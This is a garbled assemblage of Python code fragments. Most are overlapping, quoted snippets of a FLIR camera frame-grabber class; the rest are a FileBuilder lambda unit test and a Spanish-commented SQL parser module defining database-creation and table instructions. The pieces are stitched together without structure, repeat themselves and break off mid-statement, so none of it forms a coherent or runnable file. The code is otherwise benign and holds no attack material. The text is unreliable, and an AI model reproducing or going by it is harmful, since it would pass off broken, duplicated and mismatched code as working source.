set_latest_frame(self, frame): self._latest_camera_frame = frame now = time.time() duration = now", "= self._camera_list.GetBySerial(serial) self._camera.Init() self._camera_width = self._camera.Width() self._camera_height = self._camera.Height() self._camera.AcquisitionMode.SetValue(PySpin.AcquisitionMode_Continuous) self._camera.BeginAcquisition() self._is_camera_inited =", "_frame_grab_fps = 0 def is_running(self): return self._is_running def get_camera(self): return self._camera def get_dimensions(self):", "= time.time() duration = now - self._last_frame_grab_time self._frame_grab_fps = .99 * self._frame_grab_fps +", "PySpin import threading import time import cv2 class FLIRFrameGrabber: _is_camera_inited = False _latest_camera_frame", "import time import cv2 class FLIRFrameGrabber: _is_camera_inited = False _latest_camera_frame = None 
_last_frame_grab_time", "frame = target.get_camera().GetNextImage() width, height = target.get_dimensions() img = frame.GetData().reshape(height, width) target.set_latest_frame(img) frame.Release()", "now = time.time() duration = now - self._last_frame_grab_time self._frame_grab_fps = .99 * self._frame_grab_fps", "duration) self._last_frame_grab_time = now def get_latest_frame(self): return self._latest_camera_frame is not None, self._latest_camera_frame def", "thread.join() del self._threads if (self._latest_camera_frame is not None): self._latest_camera_frame = None class FrameGrabWorker:", "not None): self._latest_camera_frame = None class FrameGrabWorker: def __init__(self, index): self._index = index", "if (self._is_camera_inited is True): self._is_camera_inited = False self._camera.EndAcquisition() self._camera.DeInit() del self._camera del self._camera_width", "daemon=False) thread.start() self._threads.append(thread) def stop(self): if (self._is_running is True): self._is_running = False for", "is None: raise Exception(\"Please provide a valid FLIR camera serial number\") self._serial =", "if (self._latest_camera_frame is not None): self._latest_camera_frame = None class FrameGrabWorker: def __init__(self, index):", "deinit(self): self.stop() if (self._is_camera_inited is True): self._is_camera_inited = False self._camera.EndAcquisition() self._camera.DeInit() del self._camera", "(self._camera_width, self._camera_height) def get_fps(self): return self._frame_grab_fps def set_latest_frame(self, frame): self._latest_camera_frame = frame now", "self._camera.BeginAcquisition() self._is_camera_inited = True self._is_running = False def deinit(self): self.stop() if (self._is_camera_inited is", "target.is_running(): with self._lock: frame = target.get_camera().GetNextImage() width, height = target.get_dimensions() img = frame.GetData().reshape(height,", "__init__(self, index): self._index = index self._lock = threading.Lock() def get_camera_frame(self, target): while target.is_running():", "None, self._latest_camera_frame def __init__(self, serial=None): if serial is None: raise Exception(\"Please provide a", "self._system del self._serial def start(self, num_threads = 1): if (self._is_running is not True):", "_last_frame_grab_time = 0 _frame_grab_fps = 0 def is_running(self): return self._is_running def get_camera(self): return", "def get_dimensions(self): return (self._camera_width, self._camera_height) def get_fps(self): return self._frame_grab_fps def set_latest_frame(self, frame): self._latest_camera_frame", "del self._threads if (self._latest_camera_frame is not None): self._latest_camera_frame = None class FrameGrabWorker: def", "def get_camera(self): return self._camera def get_dimensions(self): return (self._camera_width, self._camera_height) def get_fps(self): return self._frame_grab_fps", "def set_latest_frame(self, frame): self._latest_camera_frame = frame now = time.time() duration = now -", "self._last_frame_grab_time self._frame_grab_fps = .99 * self._frame_grab_fps + .01 * (1.0 / duration) self._last_frame_grab_time", "self._system = PySpin.System.GetInstance() self._camera_list = self._system.GetCameras() self._camera = self._camera_list.GetBySerial(serial) self._camera.Init() self._camera_width = self._camera.Width()", "index): self._index = index self._lock = threading.Lock() def get_camera_frame(self, target): while target.is_running(): with", "1): if (self._is_running is not True): self._is_running = True self._threads = [] for", 
"threading.Thread(target=worker.get_camera_frame, args=(self,), daemon=False) thread.start() self._threads.append(thread) def stop(self): if (self._is_running is True): self._is_running =", "False for thread in self._threads: thread.join() del self._threads if (self._latest_camera_frame is not None):", "self._serial = serial; self._system = PySpin.System.GetInstance() self._camera_list = self._system.GetCameras() self._camera = self._camera_list.GetBySerial(serial) self._camera.Init()", "_latest_camera_frame = None _last_frame_grab_time = 0 _frame_grab_fps = 0 def is_running(self): return self._is_running", "now def get_latest_frame(self): return self._latest_camera_frame is not None, self._latest_camera_frame def __init__(self, serial=None): if", "self._camera.Width() self._camera_height = self._camera.Height() self._camera.AcquisitionMode.SetValue(PySpin.AcquisitionMode_Continuous) self._camera.BeginAcquisition() self._is_camera_inited = True self._is_running = False def", "provide a valid FLIR camera serial number\") self._serial = serial; self._system = PySpin.System.GetInstance()", "in self._threads: thread.join() del self._threads if (self._latest_camera_frame is not None): self._latest_camera_frame = None", "self._camera del self._camera_width del self._camera_height self._camera_list.Clear() del self._camera_list self._system.ReleaseInstance() del self._system del self._serial", "start(self, num_threads = 1): if (self._is_running is not True): self._is_running = True self._threads", "if (self._is_running is not True): self._is_running = True self._threads = [] for i", "= True self._threads = [] for i in range(num_threads): worker = FrameGrabWorker(i) thread", "= threading.Lock() def get_camera_frame(self, target): while target.is_running(): with self._lock: frame = target.get_camera().GetNextImage() width,", "= PySpin.System.GetInstance() self._camera_list = self._system.GetCameras() self._camera = self._camera_list.GetBySerial(serial) self._camera.Init() self._camera_width = self._camera.Width() self._camera_height", "True self._is_running = False def deinit(self): self.stop() if (self._is_camera_inited is True): self._is_camera_inited =", "<filename>flir_frame_grabber.py import PySpin import threading import time import cv2 class FLIRFrameGrabber: _is_camera_inited =", "self._camera_list = self._system.GetCameras() self._camera = self._camera_list.GetBySerial(serial) self._camera.Init() self._camera_width = self._camera.Width() self._camera_height = self._camera.Height()", "is_running(self): return self._is_running def get_camera(self): return self._camera def get_dimensions(self): return (self._camera_width, self._camera_height) def", "= 1): if (self._is_running is not True): self._is_running = True self._threads = []", "= None class FrameGrabWorker: def __init__(self, index): self._index = index self._lock = threading.Lock()", "serial=None): if serial is None: raise Exception(\"Please provide a valid FLIR camera serial", "= now - self._last_frame_grab_time self._frame_grab_fps = .99 * self._frame_grab_fps + .01 * (1.0", "get_latest_frame(self): return self._latest_camera_frame is not None, self._latest_camera_frame def __init__(self, serial=None): if serial is", "= False self._camera.EndAcquisition() self._camera.DeInit() del self._camera del self._camera_width del self._camera_height self._camera_list.Clear() del self._camera_list", "(self._is_running is True): self._is_running = False for thread in self._threads: thread.join() del self._threads", "is not None): 
self._latest_camera_frame = None class FrameGrabWorker: def __init__(self, index): self._index =", "= index self._lock = threading.Lock() def get_camera_frame(self, target): while target.is_running(): with self._lock: frame", "- self._last_frame_grab_time self._frame_grab_fps = .99 * self._frame_grab_fps + .01 * (1.0 / duration)", "thread = threading.Thread(target=worker.get_camera_frame, args=(self,), daemon=False) thread.start() self._threads.append(thread) def stop(self): if (self._is_running is True):", "is not True): self._is_running = True self._threads = [] for i in range(num_threads):", "+ .01 * (1.0 / duration) self._last_frame_grab_time = now def get_latest_frame(self): return self._latest_camera_frame", "self._camera_height self._camera_list.Clear() del self._camera_list self._system.ReleaseInstance() del self._system del self._serial def start(self, num_threads =", "= FrameGrabWorker(i) thread = threading.Thread(target=worker.get_camera_frame, args=(self,), daemon=False) thread.start() self._threads.append(thread) def stop(self): if (self._is_running", "self._serial def start(self, num_threads = 1): if (self._is_running is not True): self._is_running =", "get_camera(self): return self._camera def get_dimensions(self): return (self._camera_width, self._camera_height) def get_fps(self): return self._frame_grab_fps def", "return (self._camera_width, self._camera_height) def get_fps(self): return self._frame_grab_fps def set_latest_frame(self, frame): self._latest_camera_frame = frame", "def stop(self): if (self._is_running is True): self._is_running = False for thread in self._threads:", "FrameGrabWorker: def __init__(self, index): self._index = index self._lock = threading.Lock() def get_camera_frame(self, target):", "FLIR camera serial number\") self._serial = serial; self._system = PySpin.System.GetInstance() self._camera_list = self._system.GetCameras()", "= False _latest_camera_frame = None _last_frame_grab_time = 0 _frame_grab_fps = 0 def is_running(self):", "thread.start() self._threads.append(thread) def stop(self): if (self._is_running is True): self._is_running = False for thread", "True self._threads = [] for i in range(num_threads): worker = FrameGrabWorker(i) thread =", "self._lock = threading.Lock() def get_camera_frame(self, target): while target.is_running(): with self._lock: frame = target.get_camera().GetNextImage()", "del self._camera_height self._camera_list.Clear() del self._camera_list self._system.ReleaseInstance() del self._system del self._serial def start(self, num_threads", "self._camera_height = self._camera.Height() self._camera.AcquisitionMode.SetValue(PySpin.AcquisitionMode_Continuous) self._camera.BeginAcquisition() self._is_camera_inited = True self._is_running = False def deinit(self):" ]
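A minimal driver sketch for the class above, assuming PySpin is installed and a FLIR camera is attached; the serial value is a placeholder and the polling interval is arbitrary:

import time

grabber = FLIRFrameGrabber(serial='12345678')  # placeholder serial
grabber.start(num_threads=1)
try:
    for _ in range(100):
        has_frame, img = grabber.get_latest_frame()
        if has_frame:
            h, w = img.shape
            print('frame %dx%d, ~%.1f fps' % (w, h, grabber.get_fps()))
        time.sleep(1 / 30)  # poll at roughly 30 Hz
finally:
    grabber.deinit()  # deinit() stops the workers before PySpin teardown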
import os

from .. import FileBuilder
from .file_builder_test import FileBuilderTest


class LambdaTest(FileBuilderTest):
    """Tests that ``FileBuilder`` methods accept lambda arguments.

    Tests that ``FileBuilder`` methods accept lambdas for arguments that
    must be callables.
    """

    def _build_file(self, builder, filename):
        """Build file function for ``LambdaTest``."""
        self._write(filename, 'text')

    def _subbuild(self, builder, dir_):
        """Subbuild function for ``LambdaTest``."""
        builder.build_file(
            os.path.join(dir_, 'Output1.txt'), 'build_file', self._build_file)
        builder.build_file(
            os.path.join(dir_, 'Output2.txt'), 'build_file',
            lambda builder, filename: self._write(filename, 'text'))

    def _build(self, builder):
        """Build function for ``LambdaTest``."""
        builder.subbuild(
            'subbuild', self._subbuild, os.path.join(self._temp_dir, 'Dir1'))
        builder.subbuild(
            'subbuild', lambda builder, dir_: self._subbuild(builder, dir_),
            os.path.join(self._temp_dir, 'Dir2'))

    def test_lambda(self):
        """Test that ``FileBuilder`` methods accept lambda arguments.

        Test that ``FileBuilder`` methods accept lambdas for arguments that
        must be callable.
        """
        FileBuilder.build(self._cache_filename, 'lambda_test', self._build)
        self._check_contents(
            os.path.join(self._temp_dir, 'Dir1', 'Output1.txt'), 'text')
        self._check_contents(
            os.path.join(self._temp_dir, 'Dir1', 'Output2.txt'), 'text')
        self._check_contents(
            os.path.join(self._temp_dir, 'Dir2', 'Output1.txt'), 'text')
        self._check_contents(
            os.path.join(self._temp_dir, 'Dir2', 'Output2.txt'), 'text')
        FileBuilder.clean(self._cache_filename, 'lambda_test')
        self.assertEqual([], os.listdir(self._temp_dir))
        FileBuilder.build(
            self._cache_filename, 'lambda_test',
            lambda builder: self._build(builder))
        self._check_contents(
            os.path.join(self._temp_dir, 'Dir1', 'Output1.txt'), 'text')
        self._check_contents(
            os.path.join(self._temp_dir, 'Dir1', 'Output2.txt'), 'text')
        self._check_contents(
            os.path.join(self._temp_dir, 'Dir2', 'Output1.txt'), 'text')
        self._check_contents(
            os.path.join(self._temp_dir, 'Dir2', 'Output2.txt'), 'text')
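What the test exercises is ordinary Python callable interchangeability: a bound method and a lambda that forwards to it behave identically when passed as an argument. A self-contained sketch of that idea (the apply_builder helper is illustrative, not part of the FileBuilder API):

def apply_builder(func, value):
    """Stand-in for a FileBuilder-style method that accepts any callable."""
    return func(value)

class Demo:
    def double(self, x):
        return 2 * x

demo = Demo()
# A bound method and a forwarding lambda are interchangeable callables.
assert apply_builder(demo.double, 21) == apply_builder(lambda x: demo.double(x), 21) == 42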
<filename>parser/team09/instrucciones.py
import tabla_simbolos as TS
import Errores as E

base_actual = None


class Instruccion():
    def __init__(self, tipo, instruccion):
        self.tipo = tipo
        self.instruccion = instruccion


class Select():
    def __init__(self, dist, selcol, fromcol, joins, order, conditions):
        self.dist = dist
        self.selcol = selcol
        self.fromcol = fromcol
        self.joins = joins
        self.order = order
        self.conditions = conditions

    def execute(self):
        # Call the method that will perform the select
        print('executing select')


class AlterTable():
    def __init__(self, id, cols, constrain, fkey, ref):
        self.id = id
        self.cols = cols
        self.constrain = constrain
        self.fkey = fkey
        self.ref = ref

    def execute(self):
        print('executing alter table')
        print('id : ' + str(self.id))
        print('cols : ' + str(self.cols))
        print('constrain : ' + str(self.constrain))
        print('foreign keys : ' + str(self.fkey))
        print('references : ' + str(self.ref))


class CreateDB():
    def __init__(self, replace, ifnot, id, owner, mode):
        # boolean, boolean, string, string, integer
        self.replace = replace  # if it exists, replace/modify it
        self.ifnot = ifnot      # if it exists, do not create it
        self.id = id            # database name
        self.owner = owner      # creator name/id
        self.mode = mode        # storage mode

    def execute(self, ts_global):
        nueva_base = TS.Simbolo(self.id, TS.tipo_simbolo.DATABASE,
                                None, None, None, None, None, None)
        existe = False  # flag to check whether it exists
        bases = ts_global.get_databases()  # get every database
        for base in bases:  # walk the list of databases
            if base.id == self.id:  # and check whether it exists
                existe = True  # if it exists, flip the flag
                break  # and stop checking
        if not self.ifnot:  # no "IF NOT EXISTS": create/replace
            if self.replace:  # "OR REPLACE" present
                if existe:  # if the database exists
                    ts_global.drop_db(self.id)  # drop it first, then
                ts_global.agregar_simbolo(nueva_base)  # add the new symbol
            else:  # no "OR REPLACE"
                if existe:  # if it exists, it is an error
                    nuevo_error = E.Errores('Semantic.', 'A database named \'' + self.id + '\' already exists.')
                    #ls_error.append(nuevo_error)  # the error is added to the list
                else:  # if it does not exist
                    ts_global.agregar_simbolo(nueva_base)  # add the new symbol
        else:  # "IF NOT EXISTS" present
            if self.replace:  # combined with "OR REPLACE" it is an error
                nuevo_error = E.Errores('Semantic.', 'The clauses \'OR REPLACE\' and \'IF NOT EXISTS\' cannot be used together.')
                #ls_error.append(nuevo_error)  # the error is added to the list
            else:  # no "OR REPLACE"
                if not existe:  # if the database does not exist,
                    ts_global.agregar_simbolo(nueva_base)  # add the new symbol; otherwise do nothing


class UseDB():
    def __init__(self, id):  # string
        self.id = id  # database name

    def execute(self, ts_global):
        bases = ts_global.get_databases()  # get every database
        for base in bases:  # check whether it exists:
            if base.id == self.id:  # if it does exist, return the id
                return self.id
        # otherwise it is an error
        new_error = E.Errores('Semantic.', 'The database \'' + self.id + '\' does not exist.')
        #ls_error.append(new_error)  # the error is added to the list
        return None  # and return None


class ShowDB():
    def __init__(self):
        print('show')

    def execute(self, ts_global):
        bases = ts_global.get_databases()  # get every database
        if len(bases) == 0:  # if there are no databases,
            return '\n\tNo databases have been created.\n'  # return a message
        respuesta = '\n'  # otherwise,
        for base in bases:  # walk the list,
            respuesta = respuesta + '\t' + base.id + '\n'  # concatenate the names
        return respuesta + '\n'  # and return them


class Drop():
    def __init__(self, id):
        self.id = id

    def execute(self):
        print('Executing Drop')
        print('id : ' + self.id)


class CreateTable():
    def __init__(self, id, base, cols, inh):
        self.id = id
        self.base = base
        self.cols = cols
        self.inh = inh

    def execute(self, ts):
        print('Executing Create Table')
        print('id : ' + str(self.id))
        for col in self.cols:
            print('col id : ' + str(col.id))
            print('col type : ' + str(col.tipo))
        if self.inh is not None:
            print('Inherit : ' + self.inh)


class Insert():
    def __init__(self, id, vals):
        print('init')
        self.id = id
        self.vals = vals

    def execute(self):
        print('Executing Insert')
        print('id : ' + str(self.id))
        for val in self.vals:
            print('value : ' + str(val))


class Delete():
    def __init__(self, id, cond):
        self.id = id
        self.cond = cond

    def execute(self):
        print('Executing Delete')
        print('id : ' + str(self.id))


class Update():
    def __init__(self, id, vals):
        self.id = id
        self.vals = vals

    def execute(self):
        print('Executing Update')
        print('id : ' + str(self.id))

'''
import tabla_simbolos as TS
import Errores as E

# Creation of the symbol table
ts_global = TS.tabla_simbolos()
# Creation of the error list
ls_error = []

def create_table(db, nombre, columnas, ts):
    nueva_tabla = TS.Simbolo(nombre, TS.tipo_simbolo.TABLE, None, db, None, None, None, None)
    x = columnas.split(",")
    for i in x:
        c = i.split(":")
        print('The name is -> ' + c[0] + ' and the type is -> ' + c[1])
        #create_column(db, nombre, c[0], c[1], ts)
    ts.agregar_simbolo(nueva_tabla)
    return ts

def create_column(db, tabla, columna, tipo, ts):
    nueva_columna = TS.Simbolo(columna, TS.tipo_simbolo.INTEGER, None, db, 0, True, False, None)
    agregar = ts.agregar_columna(tabla, db, nueva_columna)
'''
None, None, None, None) x = columnas.split(\",\") for", "string self.id = id # nombre de la base de datos def execute(self,", "= vals def execute(self): print('Ejecutando Update') print('id : ' + str(id)) ''' import", "None, None, None) existe = False # bandera para comprobar si existe bases", "# y verifico si existe existe = True # si existe, cambio el", "self.fromcol = fromcol self.joins = joins self.order = order self.conditions = conditions def", "los nombres return respuesta + '\\n' # y los retorna class Drop(): def", "viene \"OR REPLACE\" if existe: # si existe la base de datos ts_global.drop_db(self.id)", "+ str(self.fkey)) print('references : ' + str(self.ref)) class CreateDB(): def __init__(self, replace, ifnot,", "= mode # modo de almacenamiento def execute(self, ts_global): nueva_base = TS.Simbolo(self.id, TS.tipo_simbolo.DATABASE,", "retorna class Drop(): def __init__(self, id): self.id = id def execute(self): print('Ejecutando Drop')", "#Creación de lista de errores ls_error = [] def create_table(db, nombre, columnas, ts):", "tabla_simbolos as TS import Errores as E base_actual = None class Instruccion(): def", "si existe, cambio el valor de la bandera break # y salgo de", "print('constrain : ' + str(self.constrain)) print('foreing keys :' + str(self.fkey)) print('references : '", "existe la base de datos ts_global.drop_db(self.id) # se elimina, luego ts_global.agregar_simbolo(nueva_base) # se", "un mensaje respuesta = '\\n' # de lo contrario, for base in bases:", "# y salgo de la comprobación if not self.ifnot: # si no viene", "cols, constrain, fkey, ref): self.id = id self.cols = cols self.constrain = constrain", "-> ' + c[0] + ' y el tipo es -> ' +", "Insert(): def __init__(self, id, vals): print('init') self.id = id self.vals = vals def", "datos creadas.\\n' # se retorna un mensaje respuesta = '\\n' # de lo", "respuesta = respuesta + '\\t' + base.id + '\\n' # se concatenan los", "concatenan los nombres return respuesta + '\\n' # y los retorna class Drop():", "si no viene \"IF NOT EXISTS\", se crea/reemplaza if self.replace: # si viene", "datos \\'' + self.id + '\\' no existe.') #ls_error.append(new_error) #se agrega el error", "de almacenamiento def execute(self, ts_global): nueva_base = TS.Simbolo(self.id, TS.tipo_simbolo.DATABASE, None, None, None, None,", "es error nuevo_error = E.Errores('Semántico.', 'No pueden venir conjuntamente las cláusulas \\'OR REPLACE\\'", ": print('col id : ' + str(col.id)) print('col type : ' + str(col.tipo))", "__init__(self, id, vals): print('init') self.id = id self.vals = vals def execute(self): print('Ejecutando", ": ' + str(self.ref)) class CreateDB(): def __init__(self, replace, ifnot, id, owner, mode):", "NOT EXISTS\\'.') #ls_error.append(nuevo_error) #se agrega el error a la lista else: # si", "simbolos ts_global = TS.tabla_simbolos() #Creación de lista de errores ls_error = [] def", "# verifico si existe: if base.id == self.id: # si sí existe, retorno", "' + str(self.cols)) print('constrain : ' + str(self.constrain)) print('foreing keys :' + str(self.fkey))", "\"OR REPLACE\", es error nuevo_error = E.Errores('Semántico.', 'No pueden venir conjuntamente las cláusulas", "NOT EXISTS\" if self.replace: # si viene \"OR REPLACE\", es error nuevo_error =", "type : ' + str(col.tipo)) if self.inh != None : print('Inherit : '", "recorro la lista de bases de datos if base.id == self.id: # y", "None, None, None, None, None, None) existe = False # bandera para comprobar", "agrega el nuevo símbolo else: # si no viene \"OR REPLACE\" if existe:", 
"# si sí existe, retorno el id return self.id # si no, es", "ifnot, id, owner, mode): # boolean, boolean, string, string, integer self.replace = replace", "'La base de datos \\'' + self.id + '\\' no existe.') #ls_error.append(new_error) #se", "def create_table(db, nombre, columnas, ts): nueva_tabla = TS.Simbolo(nombre, TS.tipo_simbolo.TABLE, None, db, None, None,", "es -> ' + c[1]) #create_column(db, nombre, c[0], c[1], ts) ts.agregar_simbolo(nueva_tabla) return ts", "es error new_error = E.Errores('Semántico.', 'La base de datos \\'' + self.id +", "Drop(): def __init__(self, id): self.id = id def execute(self): print('Ejecutando Drop') print('id :", "y verifico si existe existe = True # si existe, cambio el valor", "' + str(id)) ''' import tabla_simbolos as TS import Errores as E #Creación", "self.id: # y verifico si existe existe = True # si existe, cambio", "las bases de datos for base in bases: # recorro la lista de", "None) x = columnas.split(\",\") for i in x: c = i.split(\":\") print('El nombre", "datos for base in bases: # recorro la lista de bases de datos", "execute(self,ts): print('Ejecutando Creare Table') print('id : ' + str(self.id)) for col in self.cols", "False # bandera para comprobar si existe bases = ts_global.get_databases() # obtiene todas", "break # y salgo de la comprobación if not self.ifnot: # si no", "#ls_error.append(nuevo_error) #se agrega el error a la lista else: # si no viene", "order self.conditions = conditions def execute(): #Llamar metodo que realizara el select print('ejecutando", "# si no hay bases de datos return '\\n\\tNo hay bases de datos", "base de datos \\'' + self.id + '\\' no existe.') #ls_error.append(new_error) #se agrega", "base.id + '\\n' # se concatenan los nombres return respuesta + '\\n' #", "ts_global = TS.tabla_simbolos() #Creación de lista de errores ls_error = [] def create_table(db,", "ts_global.agregar_simbolo(nueva_base) # se agrega el nuevo símbolo else: # si sí viene \"IF", "de la base de datos def execute(self, ts_global): bases = ts_global.get_databases() # obtiene", "símbolo else: # si sí viene \"IF NOT EXISTS\" if self.replace: # si", "no existe la base de datos ts_global.agregar_simbolo(nueva_base) # se agrega el nuevo símbolo,", "el nombre \\'' + self.id + '\\'.') #ls_error.append(nuevo_error) #se agrega el error a", "error a la lista else: # si no existe ts_global.agregar_simbolo(nueva_base) # se agrega", "obtiene todas las bases de datos for base in bases: # verifico si", "None) existe = False # bandera para comprobar si existe bases = ts_global.get_databases()", "retorno None class ShowDB(): def __init__(self): print('show') def execute(self, ts_global): bases = ts_global.get_databases()", "in self.vals: print('value : ' + str(val)) class Delete(): def __init__(self, id, cond):", "+ str(id)) ''' import tabla_simbolos as TS import Errores as E #Creación de", "id, owner, mode): # boolean, boolean, string, string, integer self.replace = replace #", "la base de datos ts_global.drop_db(self.id) # se elimina, luego ts_global.agregar_simbolo(nueva_base) # se agrega", "verifico si existe: if base.id == self.id: # si sí existe, retorno el", "class Insert(): def __init__(self, id, vals): print('init') self.id = id self.vals = vals", "E.Errores('Semántico.', 'Ya existe una base de datos con el nombre \\'' + self.id", "alter table') print('id : ' + str(self.id)) print('cols : ' + str(self.cols)) print('constrain", "vals def execute(self): print('Ejecutando Update') print('id : ' + str(id)) ''' import tabla_simbolos", "si no existe 
ts_global.agregar_simbolo(nueva_base) # se agrega el nuevo símbolo else: # si", "de errores ls_error = [] def create_table(db, nombre, columnas, ts): nueva_tabla = TS.Simbolo(nombre,", "in self.cols : print('col id : ' + str(col.id)) print('col type : '", "'Ya existe una base de datos con el nombre \\'' + self.id +", "cond def execute(self): print('Ejecutando Delete') print('id : ' + str(self.id)) class Update(): def", "self.replace: # si viene \"OR REPLACE\" if existe: # si existe la base", "no se hace nada class UseDB(): def __init__(self, id): # string self.id =", "de lo contrario, for base in bases: # recorre la lista, respuesta =", "EXISTS\", se crea/reemplaza if self.replace: # si viene \"OR REPLACE\" if existe: #", "base de datos ts_global.drop_db(self.id) # se elimina, luego ts_global.agregar_simbolo(nueva_base) # se agrega el", "vals): print('init') self.id = id self.vals = vals def execute(self): print('Ejecutando Insert') print('id", "self.cols = cols self.inh = inh def execute(self,ts): print('Ejecutando Creare Table') print('id :", "error new_error = E.Errores('Semántico.', 'La base de datos \\'' + self.id + '\\'", "execute(self): print('Ejecutando Delete') print('id : ' + str(self.id)) class Update(): def __init__(self, id,", "CreateDB(): def __init__(self, replace, ifnot, id, owner, mode): # boolean, boolean, string, string,", "def __init__(self, dist, selcol, fromcol, joins, order, conditions): self.dist = dist self.selcol =", "return None # y retorno None class ShowDB(): def __init__(self): print('show') def execute(self,", "# si existe, no la crea self.id = id # nombre de la", "id return self.id # si no, es error new_error = E.Errores('Semántico.', 'La base", "= vals def execute(self): print('Ejecutando Insert') print('id : ' + str(self.id)) for val", "__init__(self, id): # string self.id = id # nombre de la base de", "= selcol self.fromcol = fromcol self.joins = joins self.order = order self.conditions =", "venir conjuntamente las cláusulas \\'OR REPLACE\\' e \\'IF NOT EXISTS\\'.') #ls_error.append(nuevo_error) #se agrega", "execute(self, ts_global): bases = ts_global.get_databases() # obtiene todas las bases de datos if", "select print('ejecutando select') class AlterTable(): def __init__(self, id, cols, constrain, fkey, ref): self.id", "tabla_simbolos as TS import Errores as E #Creación de la tabla de simbolos", "__init__(self, id, cols, constrain, fkey, ref): self.id = id self.cols = cols self.constrain", "self.vals = vals def execute(self): print('Ejecutando Update') print('id : ' + str(id)) '''", "a la lista else: # si no viene \"OR REPLACE\" if not existe:", "'\\n' # de lo contrario, for base in bases: # recorre la lista,", "as TS import Errores as E #Creación de la tabla de simbolos ts_global", "return '\\n\\tNo hay bases de datos creadas.\\n' # se retorna un mensaje respuesta", "None # y retorno None class ShowDB(): def __init__(self): print('show') def execute(self, ts_global):", "self.inh = inh def execute(self,ts): print('Ejecutando Creare Table') print('id : ' + str(self.id))", "+ c[1]) #create_column(db, nombre, c[0], c[1], ts) ts.agregar_simbolo(nueva_tabla) return ts def create_column(db, tabla,", "#Llamar metodo que realizara el select print('ejecutando select') class AlterTable(): def __init__(self, id,", "base.id == self.id: # y verifico si existe existe = True # si", "# se agrega el nuevo símbolo else: # si sí viene \"IF NOT", "' + str(col.tipo)) if self.inh != None : print('Inherit : ' + self.inh)", "nombre, columnas, ts): nueva_tabla = 
TS.Simbolo(nombre, TS.tipo_simbolo.TABLE, None, db, None, None, None, None)", "hace nada class UseDB(): def __init__(self, id): # string self.id = id #", "print('Ejecutando Update') print('id : ' + str(id)) ''' import tabla_simbolos as TS import", "con el nombre \\'' + self.id + '\\'.') #ls_error.append(nuevo_error) #se agrega el error", "if not existe: # si no existe la base de datos ts_global.agregar_simbolo(nueva_base) #", "agrega el nuevo símbolo, de lo contrario no se hace nada class UseDB():", "lista else: # si no existe ts_global.agregar_simbolo(nueva_base) # se agrega el nuevo símbolo", "# obtiene todas las bases de datos for base in bases: # recorro", "modo de almacenamiento def execute(self, ts_global): nueva_base = TS.Simbolo(self.id, TS.tipo_simbolo.DATABASE, None, None, None,", "!= None : print('Inherit : ' + self.inh) class Insert(): def __init__(self, id,", "' + str(self.id)) class Update(): def __init__(self, id, vals): self.id = id self.vals", "todas las bases de datos for base in bases: # recorro la lista", "None, None, None, None, None) existe = False # bandera para comprobar si", "de datos creadas.\\n' # se retorna un mensaje respuesta = '\\n' # de", "datos if base.id == self.id: # y verifico si existe existe = True", "existe ts_global.agregar_simbolo(nueva_base) # se agrega el nuevo símbolo else: # si sí viene", "fromcol, joins, order, conditions): self.dist = dist self.selcol = selcol self.fromcol = fromcol", "si no viene \"OR REPLACE\" if not existe: # si no existe la", "self.id = id, self.base = base self.cols = cols self.inh = inh def", ": ' + str(col.id)) print('col type : ' + str(col.tipo)) if self.inh !=", "de datos self.owner = owner # nombre/id del creador self.mode = mode #", "= id # nombre de la base de datos def execute(self, ts_global): bases", "= E.Errores('Semántico.', 'No pueden venir conjuntamente las cláusulas \\'OR REPLACE\\' e \\'IF NOT", "self.cols : print('col id : ' + str(col.id)) print('col type : ' +", "#ls_error.append(nuevo_error) #se agrega el error a la lista else: # si no existe", "id self.cols = cols self.constrain = constrain self.fkey = fkey self.ref = ref", "si existe la base de datos ts_global.drop_db(self.id) # se elimina, luego ts_global.agregar_simbolo(nueva_base) #", "si sí existe, retorno el id return self.id # si no, es error", "print('id : ' + str(self.id)) print('cols : ' + str(self.cols)) print('constrain : '", "viene \"OR REPLACE\" if not existe: # si no existe la base de", "no viene \"IF NOT EXISTS\", se crea/reemplaza if self.replace: # si viene \"OR", "EXISTS\" if self.replace: # si viene \"OR REPLACE\", es error nuevo_error = E.Errores('Semántico.',", "reemplaza/modifica self.ifnot = ifnot # si existe, no la crea self.id = id", "__init__(self, dist, selcol, fromcol, joins, order, conditions): self.dist = dist self.selcol = selcol", "es un error nuevo_error = E.Errores('Semántico.', 'Ya existe una base de datos con", "bandera para comprobar si existe bases = ts_global.get_databases() # obtiene todas las bases", "existe, cambio el valor de la bandera break # y salgo de la", "# si viene \"OR REPLACE\" if existe: # si existe la base de", "class Instruccion(): def __init__(self, tipo, instruccion): self.tipo = tipo self.instruccion = instruccion class", "de lista de errores ls_error = [] def create_table(db, nombre, columnas, ts): nueva_tabla", "AlterTable(): def __init__(self, id, cols, constrain, fkey, ref): self.id = id self.cols =", "datos self.owner = owner # nombre/id del creador self.mode = mode # modo", "# si no viene 
\"IF NOT EXISTS\", se crea/reemplaza if self.replace: # si", "y retorno None class ShowDB(): def __init__(self): print('show') def execute(self, ts_global): bases =", "def execute(): #Llamar metodo que realizara el select print('ejecutando select') class AlterTable(): def", "no existe.') #ls_error.append(new_error) #se agrega el error a la lista return None #", "viene \"IF NOT EXISTS\" if self.replace: # si viene \"OR REPLACE\", es error", "de la bandera break # y salgo de la comprobación if not self.ifnot:", "x = columnas.split(\",\") for i in x: c = i.split(\":\") print('El nombre es", "# si existe, cambio el valor de la bandera break # y salgo", ": ' + str(self.id)) for col in self.cols : print('col id : '", "TS import Errores as E #Creación de la tabla de simbolos ts_global =", "el tipo es -> ' + c[1]) #create_column(db, nombre, c[0], c[1], ts) ts.agregar_simbolo(nueva_tabla)", "print('ejecutando select') class AlterTable(): def __init__(self, id, cols, constrain, fkey, ref): self.id =", "mode): # boolean, boolean, string, string, integer self.replace = replace # si existe,", "no, es error new_error = E.Errores('Semántico.', 'La base de datos \\'' + self.id", "nombre \\'' + self.id + '\\'.') #ls_error.append(nuevo_error) #se agrega el error a la", "realizara el select print('ejecutando select') class AlterTable(): def __init__(self, id, cols, constrain, fkey,", "la bandera break # y salgo de la comprobación if not self.ifnot: #", "class Delete(): def __init__(self, id, cond): self.id = id self.cond = cond def", "# modo de almacenamiento def execute(self, ts_global): nueva_base = TS.Simbolo(self.id, TS.tipo_simbolo.DATABASE, None, None,", "E base_actual = None class Instruccion(): def __init__(self, tipo, instruccion): self.tipo = tipo", "self.joins = joins self.order = order self.conditions = conditions def execute(): #Llamar metodo", "la comprobación if not self.ifnot: # si no viene \"IF NOT EXISTS\", se", "len(bases) == 0: # si no hay bases de datos return '\\n\\tNo hay", "' y el tipo es -> ' + c[1]) #create_column(db, nombre, c[0], c[1],", "bases de datos 